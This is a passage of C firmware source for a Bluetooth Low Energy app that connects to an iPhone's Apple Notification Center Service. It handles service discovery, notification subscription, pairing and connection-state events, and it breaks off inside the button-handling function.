If so, process the data it holds,\n // and ask for more.\n else if ( notifHandle == Ancs_handleCache[ANCS_DATA_SRC_HDL_START])\n Ancs_processDataServiceNotif(pMsg);\n\n }\n //ANCS requires authentication; if the NC attempts to read/write chars on the\n //NP without proper authentication, the NP will respond with an insufficient\n //authentication error, to which we must respond with a slave security request\n else if (pMsg->method == ATT_ERROR_RSP &&\n pMsg->msg.errorRsp.reqOpcode == ATT_WRITE_REQ &&\n pMsg->msg.errorRsp.errCode == ATT_ERR_INSUFFICIENT_AUTHEN)\n {\n uint16 conn_handle;\n GAPRole_GetParameter(GAPROLE_CONNHANDLE, &conn_handle);\n uint8_t mitm;\n uint8_t bonding;\n GAPBondMgr_GetParameter(GAPBOND_MITM_PROTECTION, &mitm);\n GAPBondMgr_GetParameter(GAPBOND_BONDING_ENABLED, &bonding);\n uint8_t authRequest = ((mitm & 0x01) << 2) | ((bonding & 0x01) << 1) | (bonding & 0x01);\n\n discoveryState = ANCS_DISC_FINISH;\n ancsAppState = ANCS_STATE_READY;\n GAP_SendSlaveSecurityRequest(conn_handle, authRequest);\n }\n else if (pMsg->hdr.status == blePending)\n {\n // No HCI buffer was available. Let's try to retransmit the response\n // on the next connection event.\n if (HCI_EXT_ConnEventNoticeCmd(pMsg->connHandle, selfEntity,\n ANCSAPP_HCI_CONN_EVT_END_EVT) == SUCCESS)\n {\n // First free any pending response\n AncsApp_freeAttRsp(FAILURE);\n\n // Hold on to the response message for retransmission\n pAttRsp = pMsg;\n\n // Don't free the response message yet\n return (FALSE);\n }\n }\n //If we have received a read or write response, assume that it is related to\n //CCCD configuration\n else if (pMsg->method == ATT_READ_RSP || pMsg->method == ATT_WRITE_RSP)\n {\n }\n //Otherwise subscribe to notification source if ANCS discovery is complete\n else\n {\n }\n // Free message payload. 
Needed only for ATT Protocol messages\n GATT_bm_free(&pMsg->msg, pMsg->method);\n\n // It's safe to free the incoming message\n return (TRUE);\n}\n\n/*********************************************************************\n * @fn AncsApp_sendAttRsp\n *\n * @brief Send a pending ATT response message.\n *\n * @param none\n *\n * @return none\n */\nstatic void AncsApp_sendAttRsp(void)\n{\n // See if there's a pending ATT Response to be transmitted\n if (pAttRsp != NULL)\n {\n uint8_t status;\n\n // Increment retransmission count\n rspTxRetry++;\n\n // Try to retransmit ATT response till either we're successful or\n // the ATT Client times out (after 30s) and drops the connection.\n status = GATT_SendRsp(pAttRsp->connHandle, pAttRsp->method, &(pAttRsp->msg));\n if ((status != blePending) && (status != MSG_BUFFER_NOT_AVAIL))\n {\n // Disable connection event end notice\n HCI_EXT_ConnEventNoticeCmd(pAttRsp->connHandle, selfEntity, 0);\n\n // We're done with the response message\n AncsApp_freeAttRsp(status);\n }\n else\n {\n // Continue retrying\n Display_print1(dispHandle, 5, 0, \"Rsp send retry: %d\", rspTxRetry);\n }\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_freeAttRsp\n *\n * @brief Free ATT response message.\n *\n * @param status - response transmit status\n *\n * @return none\n */\nstatic void AncsApp_freeAttRsp(uint8_t status)\n{\n // See if there's a pending ATT response message\n if (pAttRsp != NULL)\n {\n // See if the response was sent out successfully\n if (status == SUCCESS)\n {\n Display_print1(dispHandle, 5, 0, \"Rsp sent retry: %d\", rspTxRetry);\n }\n else\n {\n // Free response payload\n GATT_bm_free(&pAttRsp->msg, pAttRsp->method);\n\n Display_print1(dispHandle, 5, 0, \"Rsp retry failed: %d\", rspTxRetry);\n }\n\n // Free response message\n ICall_freeMsg(pAttRsp);\n\n // Reset our globals\n pAttRsp = NULL;\n rspTxRetry = 0;\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_discoverService\n *\n * @brief Function to handle the discovery of the ANCS service\n *\n * @param pMsg - GATT message to process, may be NULL in DISC_ANCS_START\n *\n * @return none\n */\nstatic void AncsApp_discoverService(gattMsgEvent_t *pMsg)\n{\n // These will hold the ANCS service start and end handles that are returned after\n // GATT_DiscPrimaryServiceByUUID() function receives a response from the iPhone.\n static uint16_t Ancs_svcStartHdl;\n static uint16_t Ancs_svcEndHdl;\n\n // Stores the error code, should the discovery process fail in any state.\n static uint8_t errorcode = 0;\n\n // Enter the state machine.\n switch (discoveryState)\n {\n\n // Wait to start the discovery process till after the MTU exchange has occurred.\n case ANCS_EXCHANGE_MTU:\n {\n // If the MTU exchange has occurred, proceed to the discovery process.\n if (pMsg->method == ATT_MTU_UPDATED_EVENT)\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t1\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tExchange MTUs\");\n#endif\n discoveryState = ANCS_DISC_SERVICE;\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n }\n break;\n\n // Perform a GATT Discover Primary Service By Service UUID to locate the ANCS\n // handles.\n case ANCS_DISC_SERVICE:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t2\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDiscover the ANCS\");\n#endif\n // Initialize the ANCS handles to zero.\n 
Ancs_svcStartHdl = 0;\n Ancs_svcEndHdl = 0;\n\n // Store the ANCS UUID for GATT request.\n uint8_t uuid[ATT_UUID_SIZE] = {ANCSAPP_ANCS_SVC_UUID};\n\n // Discover the ANCS by UUID.\n uint8_t discCheck = GATT_DiscPrimaryServiceByUUID(Ancs_connHandle, uuid, ATT_UUID_SIZE, ICall_getEntityId());\n\n // If successfully discovered proceed, throw error if not.\n if(discCheck == SUCCESS)\n discoveryState = ANCS_STORE_SERVICE_HANDLES;\n else\n {\n Display_print1(dispHandle, 12, 0, \"ANCS_DISC_SERVICE FAILURE, Error code:\\t%d\",discCheck);\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 1;\n }\n }\n break;\n\n // Store the ANCS handles requested in the previous state.\n case ANCS_STORE_SERVICE_HANDLES:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t3\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tStore the ANCS handles\");\n#endif\n // Did the application receive a response from the GATT Disc Primary Service?\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP )\n {\n // Check if the ANCS was found.\n if (pMsg->msg.findByTypeValueRsp.numInfo > 0)\n {\n // Found the ANCS, so store the handles and proceed.\n Ancs_svcStartHdl = ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n Ancs_svcEndHdl = ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n discoveryState = ANCS_DISC_CHARS;\n }\n else\n {\n // The ANCS was not found.\n Display_print0(dispHandle, 12, 0, \"ANCS_STORE_SERVICE_HANDLES FAILURE\");\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 2;\n }\n\n }\n }\n break;\n\n // Use the ANCS handles to discover the ANCS's characteristics' handles.\n case ANCS_DISC_CHARS:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t4\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDiscover the ANCS characteristics\");\n#endif\n // Check if service handle discovery event has completed.\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP )\n {\n if(pMsg->hdr.status == bleProcedureComplete)\n {\n // Sanity check to make sure the handle is valid before proceeding.\n if (Ancs_svcStartHdl != 0)\n {\n // Discover all characteristics of the ANCS.\n uint8_t discCheck = GATT_DiscAllChars(Ancs_connHandle, Ancs_svcStartHdl, Ancs_svcEndHdl, ICall_getEntityId());\n\n // If the request was successfully sent, proceed with the discovery process.\n if (discCheck == SUCCESS)\n {\n discoveryState = ANCS_STORE_CHARS_HANDLES;\n }\n // If not, throw an error.\n else\n {\n Display_print1(dispHandle, 12, 0, \"ANCS_DISC_CHARS FAILURE, Error code:\\t%d\",discCheck);\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 3;\n }\n }\n }\n }\n }\n break;\n\n // Store the retrieved ANCS characteristic handles.\n case ANCS_STORE_CHARS_HANDLES:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t5\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tStore the ANCS characteristics' handles\");\n#endif\n // Wait until GATT \"Read by type response\" is received, then confirm that the correct number of\n // pairs are present, and that their length is correct\n if (pMsg->method == ATT_READ_BY_TYPE_RSP )\n {\n if ( (pMsg->msg.readByTypeRsp.numPairs == NUMBER_OF_ANCS_CHARS) && (pMsg->msg.readByTypeRsp.len == CHAR_DESC_HDL_UUID128_LEN) )\n {\n
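 // Note (added comment): each entry in this Read By Type response is\n // CHAR_DESC_HDL_UUID128_LEN = 21 bytes: a 2-byte declaration handle,\n // a 1-byte properties field, a 2-byte value handle, and a 16-byte UUID.\n // Hence the value handle is read at offset 3 and the first two\n // (little-endian) UUID bytes at offset 5 below.\n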
 // Pointer to the pair list data in the GATT response.\n uint8_t *pCharPairList;\n // Will store the start and end handles of the current pair.\n uint16_t charStartHandle;\n uint16_t charEndHandle;\n // Stores the UUID of the current pair.\n uint16_t charUuid;\n // Stores what pair the loop is currently processing.\n uint8_t currentCharIndex;\n\n // Set the pair pointer to the first pair.\n pCharPairList = pMsg->msg.readByTypeRsp.pDataList;\n\n // Iterate through all three pairs found.\n for(currentCharIndex = NUMBER_OF_ANCS_CHARS; currentCharIndex > 0 ; currentCharIndex--)\n {\n // Extract the starting handle, ending handle, and UUID of the current characteristic.\n charStartHandle = BUILD_UINT16(pCharPairList[3], pCharPairList[4]);\n // To extract the end handle for each characteristic, take the starting handle of the next characteristic\n // and subtract one from it.\n charEndHandle = BUILD_UINT16(pCharPairList[CHAR_DESC_HDL_UUID128_LEN], pCharPairList[CHAR_DESC_HDL_UUID128_LEN + 1]) - 1;\n charUuid = BUILD_UINT16(pCharPairList[5], pCharPairList[6]);\n\n // Store the start and end handles in the handle cache corresponding to\n // their UUID.\n switch (charUuid)\n {\n // If it's the Notification Source.\n case ANCSAPP_NOTIF_SRC_CHAR_UUID:\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START] = charStartHandle;\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_END] = charEndHandle;\n break;\n // If it's the Control Point.\n case ANCSAPP_CTRL_PT_CHAR_UUID:\n Ancs_handleCache[ANCS_CTRL_POINT_HDL_START] = charStartHandle;\n Ancs_handleCache[ANCS_CTRL_POINT_HDL_END] = charEndHandle;\n break;\n // If it's the Data Source.\n case ANCSAPP_DATA_SRC_CHAR_UUID:\n Ancs_handleCache[ANCS_DATA_SRC_HDL_START] = charStartHandle;\n Ancs_handleCache[ANCS_DATA_SRC_HDL_END] = charEndHandle;\n break;\n\n default:\n break;\n }\n\n // If this is the final characteristic found in the response,\n // reset its end handle to the ANCS's end handle. This is because\n // there is no next starting handle to use as a reference and subtract one\n // from, so instead the ending handle of the ANCS must be used.\n if(currentCharIndex == LAST_ANCS_CHAR)\n Ancs_handleCache[ANCS_DATA_SRC_HDL_END] = Ancs_svcEndHdl;\n\n // Increment the pair pointer to the next pair.\n pCharPairList += CHAR_DESC_HDL_UUID128_LEN;\n }\n\n // Sanity check to ensure that each start handle is valid and\n // less than each respective end handle.\n if(Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START] != 0 &&\n Ancs_handleCache[ANCS_CTRL_POINT_HDL_START] != 0 &&\n Ancs_handleCache[ANCS_DATA_SRC_HDL_START] != 0)\n {\n if(Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START] < Ancs_handleCache[ANCS_NOTIF_SCR_HDL_END] &&\n Ancs_handleCache[ANCS_CTRL_POINT_HDL_START] < Ancs_handleCache[ANCS_CTRL_POINT_HDL_END] &&\n Ancs_handleCache[ANCS_DATA_SRC_HDL_START] < Ancs_handleCache[ANCS_DATA_SRC_HDL_END])\n {\n discoveryState = ANCS_DISC_NS_DESCS;\n }\n else\n {\n Display_print0(dispHandle, 12, 0, \"ANCS_STORE_CHARS_HANDLES FAILURE\");\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 4;\n }\n }\n // Throw an error if the handles are invalid.\n else\n {\n Display_print0(dispHandle, 12, 0, \"ANCS_STORE_CHARS_HANDLES FAILURE\");\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 5;\n }\n }\n // Throw an error if the length or number of pairs is incorrect.\n else\n {\n Display_print0(dispHandle, 12, 0, \"ANCS_STORE_CHARS_HANDLES FAILURE\");\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 6;\n }\n }\n }\n break;\n\n // Discover the Notification Source's descriptors (namely, the CCCD) using the start\n // and end handle stored in the handle cache.\n case ANCS_DISC_NS_DESCS:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t6\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDiscover 
the Notification Source's CCCD\");\n#endif\n // Wait until the characteristic handle discovery has finished.\n if ( (pMsg->method == ATT_READ_BY_TYPE_RSP) && (pMsg->hdr.status == bleProcedureComplete) )\n {\n // Discover the ANCS Notification Source descriptors.\n uint8_t discCheck = GATT_DiscAllCharDescs(Ancs_connHandle,\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START],\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_END],\n ICall_getEntityId());\n // If the discovery was successful, proceed.\n if ( discCheck == SUCCESS )\n discoveryState = ANCS_STORE_NS_DESCS_HANDLES;\n // If not, throw an error and invalidate the CCCD handle in the handle cache.\n else\n {\n Display_print0(dispHandle, 6, 0, \"ANCS_DISC_NS_DESCS FAILURE\");\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START] = 0;\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 7;\n }\n }\n }\n break;\n\n // Store the retrieved Notification Source descriptors (namely, the CCCD).\n case ANCS_STORE_NS_DESCS_HANDLES:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t7\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tStore the Notification Source's CCCD handle\");\n#endif\n // Wait for the discovery response.\n if (pMsg->method == ATT_FIND_INFO_RSP )\n {\n // Sanity check to validate that at least one descriptor pair was found,\n // and that the pair length is correct.\n if ( (pMsg->msg.findInfoRsp.numInfo > 0) && (pMsg->msg.findInfoRsp.format == ATT_HANDLE_BT_UUID_TYPE) )\n {\n // This will keep track of the current pair being processed.\n uint8_t currentPair;\n\n // Iterate through the pair list.\n for(currentPair = 0; currentPair < pMsg->msg.findInfoRsp.numInfo; currentPair++)\n {\n // Check if the pair is a CCCD.\n if (ATT_BT_PAIR_UUID(pMsg->msg.findInfoRsp.pInfo, currentPair) == GATT_CLIENT_CHAR_CFG_UUID)\n {\n // If so, store the handle in the handle cache, and proceed.\n Ancs_handleCache[ANCS_NOTIF_SCR_HDL_CCCD] = ATT_BT_PAIR_HANDLE(pMsg->msg.findInfoRsp.pInfo, currentPair);\n discoveryState = ANCS_DISC_DS_DESCS;\n }\n }\n }\n }\n }\n break;\n\n // Discover the Data Source's descriptors (namely, the CCCD) using the start\n // and end handle stored in the handle cache.\n case ANCS_DISC_DS_DESCS:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t8\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDiscover the Data Source's CCCD\");\n#endif\n // Wait until the Notification Source descriptors discovery has finished.\n if ( (pMsg->method == ATT_FIND_INFO_RSP) && (pMsg->hdr.status == bleProcedureComplete) )\n {\n\n // Discover ANCS Data Source CCCD\n uint8_t discCheck = GATT_DiscAllCharDescs(Ancs_connHandle,\n Ancs_handleCache[ANCS_DATA_SRC_HDL_START] + 1,\n Ancs_handleCache[ANCS_DATA_SRC_HDL_END],\n ICall_getEntityId());\n // If the discovery was successful, proceed.\n if (discCheck == SUCCESS )\n discoveryState = ANCS_STORE_DS_DESCS_HANDLES;\n // If not, throw an error and invalidate the CCCD handle in the handle cache.\n else\n {\n Display_print0(dispHandle, 6, 0, \"ANCS_DISC_DS_DESCS FAILURE\");\n Ancs_handleCache[ANCS_DATA_SRC_HDL_CCCD] = 0;\n discoveryState = ANCS_DISC_FAILED;\n errorcode = 8;\n }\n }\n }\n break;\n\n // Store the retrieved Data Source descriptors (namely, the CCCD).\n case ANCS_STORE_DS_DESCS_HANDLES:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t9\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tStore the Data 
Source's CCCD handle\");\n#endif\n // Wait for the discovery response.\n if (pMsg->method == ATT_FIND_INFO_RSP )\n {\n // Sanity check to validate that at least one descriptor pair was found,\n // and that the pair length is correct.\n if ( (pMsg->msg.findInfoRsp.numInfo > 0) && (pMsg->msg.findInfoRsp.format == ATT_HANDLE_BT_UUID_TYPE) )\n {\n // This will keep track of the current pair being processed.\n uint8_t currentPair;\n\n // Iterate through the pair list.\n for(currentPair = 0; currentPair < pMsg->msg.findInfoRsp.numInfo; currentPair++)\n {\n // Check if the pair is a CCCD.\n if (ATT_BT_PAIR_UUID(pMsg->msg.findInfoRsp.pInfo, currentPair) == GATT_CLIENT_CHAR_CFG_UUID)\n {\n // If so, store the handle in the handle cache, and proceed to the subscription process.\n Ancs_handleCache[ANCS_DATA_SRC_HDL_CCCD] = ATT_BT_PAIR_HANDLE(pMsg->msg.findInfoRsp.pInfo, currentPair);\n discoveryState = ANCS_WRITE_DS_CCCD;\n\n // The next state may need to run multiple times, thus it relies on\n // event posts as opposed to a singular event like a BLE complete response.\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n }\n }\n }\n }\n break;\n\n // Subscribe to the Data Source. This is done first because when the Notification Source\n // is subscribed to, it will immediately send GATT notifications for every ANCS notification\n // present. This can hinder app functionality as some ANCS notifications may be ignored\n // due to the app receiving them before it is initialized to a state which can process them.\n // To avoid this, we subscribe to the Notification Source second.\n case ANCS_WRITE_DS_CCCD:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t10\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tSubscribe to the Data Source\");\n#endif\n
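 // Note (added comment): \"subscribing\" here means writing the value 0x0001\n // (enable notifications) to the characteristic's Client Characteristic\n // Configuration Descriptor (CCCD), whose handle was cached during discovery;\n // Ancs_subsDataSrc() below is expected to perform that GATT write.\n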
 // Call the function which writes to the Data Source's CCCD.\n uint8_t check = Ancs_subsDataSrc();\n\n // If it is successful, advance the state. If the check is not\n // successful, a loop will be sustained until the subscription succeeds.\n if(check == SUCCESS)\n discoveryState = ANCS_WRITE_NS_CCCD;\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n break;\n\n // Subscribe to the Notification Source second for the reason described in the previous state.\n case ANCS_WRITE_NS_CCCD:\n {\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t11\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tSubscribe to the Notification Source\");\n#endif\n // Call the function which writes to the Notification Source's CCCD.\n uint8_t check = Ancs_subsNotifSrc();\n\n // If it is successful, set the discovery state to FINISH and the app state to READY.\n // If the check is not successful, a loop will be sustained until the subscription succeeds.\n if(check == SUCCESS)\n {\n discoveryState = ANCS_DISC_FINISH;\n ancsAppState = ANCS_STATE_READY;\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t12\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tProcessing notification data\");\n#endif\n }\n else\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n break;\n }\n if(errorcode != 0)\n {\n#ifdef USE_GUI_COMPOSER\n Display_print1(dispHandle, 16, 0, \"Discovery State:\\tDiscovery Error: %d\",errorcode);\n#else\n Display_print1(dispHandle, 16, 0, \"Discovery Error: %d\",errorcode);\n#endif\n }\n return;\n}\n\n/*********************************************************************\n * @fn AncsApp_processAppMsg\n *\n * @brief Process an incoming callback from a profile.\n *\n * @param pMsg - message to process\n *\n * @return None.\n */\nstatic void AncsApp_processAppMsg(ancsAppEvt_t *pMsg)\n{\n switch (pMsg->hdr.event)\n {\n // State change event triggered.\n case ANCSAPP_STATE_CHANGE_EVT:\n {\n AncsApp_processStateChangeEvt((gaprole_States_t)pMsg->hdr.state);\n }\n break;\n\n // Pairing event triggered.\n case ANCSAPP_PAIRING_STATE_EVT:\n {\n AncsApp_processPairState(pMsg->hdr.state, *pMsg->pData);\n\n ICall_free(pMsg->pData);\n break;\n }\n\n // Passcode event triggered.\n case ANCSAPP_PASSCODE_NEEDED_EVT:\n {\n AncsApp_processPasscode(*pMsg->pData);\n\n ICall_free(pMsg->pData);\n break;\n }\n\n // CC2640R2 board button event triggered.\n case ANCSAPP_KEY_CHANGE_EVT:\n {\n AncsApp_handleKeysEvt(pMsg->hdr.state);\n\n break;\n }\n\n default:\n // Do nothing.\n break;\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_stateChangeCB\n *\n * @brief Callback from GAP Role indicating a role state change.\n *\n * @param newState - new state\n *\n * @return None.\n */\nstatic void AncsApp_stateChangeCB(gaprole_States_t newState)\n{\n AncsApp_enqueueMsg(ANCSAPP_STATE_CHANGE_EVT, newState, 0);\n}\n\n/*********************************************************************\n * @fn AncsApp_processStateChangeEvt\n *\n * @brief Process a pending GAP Role state change event.\n *\n * @param newState - new state\n *\n * @return None.\n */\nstatic void AncsApp_processStateChangeEvt(gaprole_States_t newState)\n{\n#ifdef PLUS_BROADCASTER\n static bool firstConnFlag = false;\n#endif // PLUS_BROADCASTER\n\n switch ( newState )\n {\n case GAPROLE_STARTED:\n {\n uint8_t ownAddress[B_ADDR_LEN];\n uint8_t systemId[DEVINFO_SYSTEM_ID_LEN];\n\n GAPRole_GetParameter(GAPROLE_BD_ADDR, ownAddress);\n\n // use 6 bytes of device address for 8 bytes of system ID value\n systemId[0] = ownAddress[0];\n systemId[1] = ownAddress[1];\n systemId[2] = ownAddress[2];\n\n // 
set middle bytes to zero\n systemId[4] = 0x00;\n systemId[3] = 0x00;\n\n // shift three bytes up\n systemId[7] = ownAddress[5];\n systemId[6] = ownAddress[4];\n systemId[5] = ownAddress[3];\n\n DevInfo_SetParameter(DEVINFO_SYSTEM_ID, DEVINFO_SYSTEM_ID_LEN, systemId);\n\n // Display device address\n Display_print0(dispHandle, 1, 0, Util_convertBdAddr2Str(ownAddress));\n Display_print0(dispHandle, 2, 0, \"Initialized\");\n }\n break;\n\n case GAPROLE_ADVERTISING:\n#ifdef USE_WATCHDOG_TIMER\n Util_startClock(&periodicClock);\n#endif\n Display_print0(dispHandle, 2, 0, \"Advertising\");\n break;\n\n#ifdef PLUS_BROADCASTER\n // After a connection is dropped, a device in PLUS_BROADCASTER will continue\n // sending non-connectable advertisements and shall send this change of\n // state to the application. These are then disabled here so that sending\n // connectable advertisements can resume.\n case GAPROLE_ADVERTISING_NONCONN:\n {\n#ifdef USE_WATCHDOG_TIMER\n Util_startClock(&periodicClock);\n#endif\n uint8_t advertEnabled = FALSE;\n\n // Disable non-connectable advertising.\n GAPRole_SetParameter(GAPROLE_ADV_NONCONN_ENABLED, sizeof(uint8_t),\n &advertEnabled);\n\n advertEnabled = TRUE;\n\n // Enable connectable advertising.\n GAPRole_SetParameter(GAPROLE_ADVERT_ENABLED, sizeof(uint8_t),\n &advertEnabled);\n\n // Reset flag for next connection.\n firstConnFlag = false;\n\n AncsApp_freeAttRsp(bleNotConnected);\n }\n break;\n#endif //PLUS_BROADCASTER\n\n case GAPROLE_CONNECTED:\n {\n uint8_t ownAddress[B_ADDR_LEN];\n uint8_t systemId[DEVINFO_SYSTEM_ID_LEN];\n GAPRole_GetParameter(GAPROLE_BD_ADDR, ownAddress);\n\n // Rebuild the system ID from the device address before setting it\n // (the array was previously passed to DevInfo_SetParameter\n // uninitialized).\n systemId[0] = ownAddress[0];\n systemId[1] = ownAddress[1];\n systemId[2] = ownAddress[2];\n systemId[3] = 0x00;\n systemId[4] = 0x00;\n systemId[5] = ownAddress[3];\n systemId[6] = ownAddress[4];\n systemId[7] = ownAddress[5];\n DevInfo_SetParameter(DEVINFO_SYSTEM_ID, DEVINFO_SYSTEM_ID_LEN, systemId);\n\n uint8_t peerAddress[B_ADDR_LEN];\n GAPRole_GetParameter(GAPROLE_CONN_BD_ADDR, peerAddress);\n Display_print0(dispHandle, 2, 0, \"Connected\");\n Display_print0(dispHandle, 3, 0, Util_convertBdAddr2Str(peerAddress));\n\n\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t0\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tConnected\");\n#endif\n\n // Initialize the app and discovery state to their respective beginning.\n notifAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n appAttrPktProcessState = NOTI_ATTR_FIRST_PKT;\n discoveryState = ANCS_EXCHANGE_MTU;\n ancsAppState = ANCS_STATE_DISCOVERY;\n\n #ifdef PLUS_BROADCASTER\n // Only turn advertising on for this state when we first connect\n // otherwise, when we go from connected_advertising back to this state\n // we will be turning advertising back on.\n if (firstConnFlag == false)\n {\n uint8_t advertEnabled = FALSE;\n\n // Disable connectable advertising.\n GAPRole_SetParameter(GAPROLE_ADVERT_ENABLED, sizeof(uint8_t),\n &advertEnabled);\n\n // Set to true for non-connectable advertising.\n advertEnabled = TRUE;\n\n // Enable non-connectable advertising.\n GAPRole_SetParameter(GAPROLE_ADV_NONCONN_ENABLED, sizeof(uint8_t),\n &advertEnabled);\n firstConnFlag = true;\n }\n #endif // PLUS_BROADCASTER\n }\n break;\n\n case GAPROLE_CONNECTED_ADV:\n Display_print0(dispHandle, 2, 0, \"Connected Advertising\");\n break;\n\n case GAPROLE_WAITING:\n // Free the ATT response, clear the handle cache, and clear the ANCS notification queue.\n#ifdef USE_WATCHDOG_TIMER\n Util_stopClock(&periodicClock);\n#endif\n AncsApp_freeAttRsp(bleNotConnected);\n
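 // Note (added comment): Ancs_handleCache holds HDL_CACHE_LEN uint16_t\n // entries, so HDL_CACHE_LEN*2 bytes are cleared below.\n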
\"Discovery Progress:\\t0\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tDisconnected\");\n#endif\n Ancs_popAllNotifsFromQueue();\n\n // Clear remaining lines\n Display_clearLines(dispHandle, 4, 30);\n break;\n\n case GAPROLE_WAITING_AFTER_TIMEOUT:\n // Free the ATT response, clear the handle cache, and clear the ANCS notification queue.\n#ifdef USE_WATCHDOG_TIMER\n Util_stopClock(&periodicClock);\n#endif\n AncsApp_freeAttRsp(bleNotConnected);\n VOID memset(Ancs_handleCache, '\\0', HDL_CACHE_LEN*2);\n Display_print0(dispHandle, 3, 0, \"Timed Out\");\n#ifdef USE_GUI_COMPOSER\n Display_print0(dispHandle, 16, 0, \"Discovery Progress:\\t0\");\n Display_print0(dispHandle, 16, 0, \"Discovery State:\\tTimed out\");\n#endif\n Ancs_popAllNotifsFromQueue();\n\n // Clear remaining lines\n Display_clearLines(dispHandle, 4, 30);\n\n #ifdef PLUS_BROADCASTER\n // Reset flag for next connection.\n firstConnFlag = false;\n #endif // PLUS_BROADCASTER\n break;\n\n case GAPROLE_ERROR:\n Display_print0(dispHandle, 2, 0, \"Error\");\n break;\n\n default:\n Display_clearLine(dispHandle, 2);\n break;\n }\n\n}\n\n/*********************************************************************\n * @fn AncsApp_pairStateCB\n *\n * @brief Pairing state callback.\n *\n * @return none\n */\nstatic void AncsApp_pairStateCB(uint16_t connHandle, uint8_t state,\n uint8_t status)\n{\n uint8_t *pData;\n\n // Allocate space for the event data.\n if ((pData = ICall_malloc(sizeof(uint8_t))))\n {\n *pData = status;\n\n // Queue the event.\n AncsApp_enqueueMsg(ANCSAPP_PAIRING_STATE_EVT, state, pData);\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_processPairState\n *\n * @brief Process the new paring state.\n *\n * @return none\n */\nstatic void AncsApp_processPairState(uint8_t state, uint8_t status)\n{\n if (state == GAPBOND_PAIRING_STATE_STARTED)\n {\n Display_print0(dispHandle, 2, 0, \"Pairing started\");\n }\n else if (state == GAPBOND_PAIRING_STATE_COMPLETE)\n {\n if (status == SUCCESS)\n {\n Display_print0(dispHandle, 2, 0, \"Pairing Successful\");\n\n // Now that the device has successfully paired to the iPhone,\n // the subscription will not fail due to insufficient authentication.\n discoveryState = ANCS_WRITE_DS_CCCD;\n Event_post(syncEvent, ANCSAPP_START_DISC_EVT);\n }\n else\n {\n Display_print1(dispHandle, 2, 0, \"Pairing fail: %d\", status);\n }\n }\n else if (state == GAPBOND_PAIRING_STATE_BONDED)\n {\n if (status == SUCCESS)\n {\n Display_print0(dispHandle, 2, 0, \"Bonding Successful\");\n }\n }\n else if (state == GAPBOND_PAIRING_STATE_BOND_SAVED)\n {\n if (status == SUCCESS)\n {\n Display_print0(dispHandle, 2, 0, \"Bond save success\");\n }\n else\n {\n Display_print1(dispHandle, 2, 0, \"Bond save failed: %d\", status);\n }\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_handleKeysEvt\n *\n * @brief Handles all key events for this device.\n *\n * @param keys - bit field for key events.\n *\n * @return none\n */\nstatic void AncsApp_handleKeysEvt(uint8_t keys)\n{\n // If: Both keys are pressed.\n if (keys == IO_BUTTON_BOTH)\n Display_clearLines(dispHandle, 4, 30);\n\n // Else If: A single key is pressed.\n else\n {\n // Calls the function to perform a negative action upon the current notification.\n if (keys == 